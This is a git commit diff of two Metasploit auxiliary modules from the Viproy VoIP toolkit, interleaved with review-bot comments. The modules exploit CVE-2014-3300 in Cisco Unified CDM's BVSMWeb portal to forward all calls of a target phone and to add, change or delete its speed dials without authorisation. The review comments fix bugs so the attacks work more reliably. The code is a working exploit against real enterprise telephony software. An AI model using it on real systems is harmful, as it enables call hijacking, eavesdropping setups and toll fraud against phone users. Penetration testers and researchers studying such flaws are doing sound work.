First revision of the Viproy CUCDM exploits

bug/bundler_fix
Fatih Ozavci 2014-10-28 13:53:13 +11:00
parent 1db09fee01
commit 703393e9f1
2 changed files with 78 additions and 41 deletions


@ -15,28 +15,42 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Version' => '1',
'Description' => %q{
CUCDM IP Phone XML Services - Call Forwarding Tool
This tool can be tested with the voss-xmlservice component of Viproy.
https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
in Unified CDM Application Software before 10 does not properly implement access control,
which allows remote attackers to modify user information. This vulnerability can be exploited
for unauthorised call forwarding using this module. This tool can be tested with the fake
voss-xmlservice component of Viproy.
},
'Author' => 'Fatih Ozavci <viproy.com/fozavci>',
'References' =>
'References' =>
[
['CVE', 'CVE-2014-3300'],
['CVE', '2014-3300'],
['BID', '68331'],
['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'FORWARD', {
'Description' => 'Enabling the call forwarding for the MAC address.'
} ],
[ 'INFO', {
'Description' => 'Retrieving the call forwarding information for the MAC address.'
} ],
[ 'list', {
'Description' => 'List the actions that would be started'
} ]
],
'DefaultAction' => 'INFO'
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('ACTION', [ true, 'Call forwarding action (FORWARD,INFO)', 'FORWARD']),
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines', '']),
], self.class)
end
@ -44,21 +58,21 @@ class Metasploit3 < Msf::Auxiliary
def run
uri = normalize_uri(target_uri.to_s)
mac = Rex::Text.uri_encode(datastore["MAC"])
forwardto = Rex::Text.uri_encode(datastore["FORWARDTO"])
forward_to = Rex::Text.uri_encode(datastore["FORWARDTO"])
print_status("Getting fintnumbers and display names of the IP phone")
uri_show=uri+"/showcallfwd.cgi?device=SEP#{mac}"
uri_show=normalize_uri(uri+"/showcallfwd.cgi?device=SEP#{mac}")
vprint_status("URL: "+uri_show)
res = send_request_cgi(
{
'uri' => uri_show,
'method' => 'GET',
}, 20)
})
if (res and res.code == 200 and res.body =~ /fintnumber/)
if res and res.code == 200 and res.body =~ /fintnumber/
doc = REXML::Document.new(res.body)
lines=[]
fintnumbers=[]
@ -72,29 +86,31 @@ class Metasploit3 < Msf::Auxiliary
}
lines.size.times{|i| print_status("Display Name: "+lines[i]+"\t"+"Fintnumber: "+fintnumbers[i])}
# for a specific FINTNUMBER redirection
fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]
if datastore["ACTION"] == "FORWARD"
if action.name.upcase == "FORWARD"
fintnumbers.each {|fintnumber|
print_status("Sending call forward request for #{fintnumber}")
uri_fwd=uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forwardto}"
uri_fwd=normalize_uri(uri+"/phonecallfwd.cgi?cfoption=CallForwardAll&device=SEP#{mac}&ProviderName=NULL&fintnumber=#{fintnumber}&telno1=#{forward_to}")
vprint_status("URL: "+uri_fwd)
res = send_request_cgi(
{
'uri' => uri_fwd,
'method' => 'GET',
}, 20)
})
uri_fwdpln=uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}"
uri_fwdpln=normalize_uri(uri+"/showcallfwdperline.cgi?device=SEP#{mac}&fintnumber=#{fintnumber}")
vprint_status("URL: "+uri_fwdpln)
res = send_request_cgi(
{
'uri' => uri_fwdpln,
'method' => 'GET',
}, 20)
})
if (res.body.to_s =~ /CFA/)
if res and res.body and res.body.to_s =~ /CFA/
print_good("Call forwarded successfully for #{fintnumber}")
else
print_status("Call forward failed.")
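Review bot: The guard in `fintnumbers = [datastore["FINTNUMBER"]] if [datastore["FINTNUMBER"]]` (last hunk) is always true, because a one-element array literal is truthy in Ruby even when its element is empty or nil. Since FINTNUMBER is registered as optional with a default of `''`, the list parsed from the showcallfwd.cgi response is always discarded, and the FORWARD branch then sends its state-changing request for a value the operator never supplied. Test the option value instead of the array: `fintnumbers = [datastore["FINTNUMBER"]] unless datastore["FINTNUMBER"].to_s.empty?`. `run` begins in the previous hunk and continues past the end of this one, so the remaining branches are not visible here.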


@ -13,19 +13,40 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
'Version' => '1',
'Description' => %q{
CUCDM IP Phone XML Services - Speed Dial Attack Tool
This tool can be tested with the voss-xmlservice component of Viproy.
https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM)
in Unified CDM Application Software before 10 does not properly implement access control,
which allows remote attackers to modify user information. This vulnerability can be exploited
for unauthorised speeddial manipulation using this module. This tool can be tested with the fake
voss-xmlservice component of Viproy.
},
'Author' => 'Fatih Ozavci <viproy.com/fozavci>',
'References' =>
[
['CVE', 'CVE-2014-3300'],
['CVE', '2014-3300'],
['BID', '68331'],
['Viproy Fake CUCDM Service', 'https://github.com/fozavci/viproy-voipkit/raw/master/external/voss-xmlservice.rb']
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'GET', {
'Description' => 'Getting the speeddials for the MAC address.'
} ],
[ 'MODIFY', {
'Description' => 'Modifying a speeddial for the MAC address.'
} ],
[ 'ADD', {
'Description' => 'Adding a speeddial for the MAC address.'
} ],
[ 'DELETE', {
'Description' => 'Deleting a speeddial for the MAC address.'
} ],
[ 'list', {
'Description' => 'List the actions that would be started'
} ]
],
'DefaultAction' => 'GET'
)
register_options(
@ -33,7 +54,6 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('ACTION', [ true, 'Speed Dials Action: LIST|MODIFY|ADD|DELETE', 'LIST']),
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
@ -48,19 +68,19 @@ class Metasploit3 < Msf::Auxiliary
telno = Rex::Text.uri_encode(datastore["TELNO"])
case datastore["ACTION"].upcase
case action.name.upcase
when 'MODIFY'
print_status("Deleting Speed Dial of the IP phone")
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
print_good("Speed Dial #{position} is deleted successfully")
print_status("Adding Speed Dial to the IP phone")
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Added/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
print_good("Speed Dial #{position} is added successfully")
elsif res.body =~ /exist/
print_error("Speed Dial is exist, change the position or choose modify!")
@ -74,8 +94,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Deleting Speed Dial of the IP phone")
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Deleted/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
print_good("Speed Dial #{position} is deleted successfully")
else
print_error("Speed Dial is not found!")
@ -84,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Adding Speed Dial to the IP phone")
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
if (res != Exploit::CheckCode::Safe and res.body =~ /Added/)
status,res=send_rcv(url)
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
print_good("Speed Dial #{position} is added successfully")
elsif res.body =~ /exist/
print_error("Speed Dial is exist, change the position or choose modify!")
@ -97,23 +117,24 @@ class Metasploit3 < Msf::Auxiliary
url=uri+"/speeddials.cgi?device=SEP#{mac}"
vprint_status("URL: "+url)
res=send_rcv(url)
parse(res) if res != Exploit::CheckCode::Safe
status,res=send_rcv(url)
parse(res) if status != Exploit::CheckCode::Safe
end
end
def send_rcv(uri)
uri=normalize_uri(uri.to_s)
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
}, 20)
if (res and res.code == 200 and res.body =~ /Speed [D|d]ial/)
return res
})
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
return Exploit::CheckCode::Vulnerable,res
else
print_error("Target appears not vulnerable!")
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe,res
end
end
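Review bot: `send_rcv` now returns `Exploit::CheckCode::Safe,res` even when `res` is nil, which its own `if res and ...` check shows is possible. The `elsif res.body =~ /exist/` fallbacks in the MODIFY and ADD paths are reached in exactly that case, so a missing response raises NoMethodError instead of printing an error. Guard the fallback with `elsif res && res.body =~ /exist/`, or return early in the caller when `res` is nil. Separately, the character class in `/Speed [D|d]ial/` also accepts a literal `|`; `/Speed [Dd]ial/` states the intent. The `case action.name.upcase` statement is split across hunks and only partly shown, so other branches may need the same guard.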